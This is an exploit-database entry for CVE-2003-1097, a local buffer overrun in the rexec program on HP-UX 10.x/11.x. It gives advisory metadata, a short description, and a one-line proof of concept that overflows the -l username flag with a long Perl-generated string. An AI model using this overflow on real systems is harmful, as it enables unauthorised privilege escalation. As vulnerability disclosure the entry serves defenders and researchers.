HP-UX 10.x/11.x - RExec Remote 'Username' Flag Local Buffer Overrun

Author: Davide Del Vecchio
type: dos
platform: hp-ux
port: 
date_added: 2003-04-29 
date_updated: 2012-11-08 
verified: 1 
codes: CVE-2003-1097;OSVDB-16021 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/7459/info

It has been reported that a problem in the rexec program included with some versions of HP-UX may be vulnerable to a boundary condition error. It may be possible for a local user to exploit this vulnerability to gain elevated privileges on the system.

exec 127.0.0.1 -l `perl -e 'printf "A" x 9777'` -n something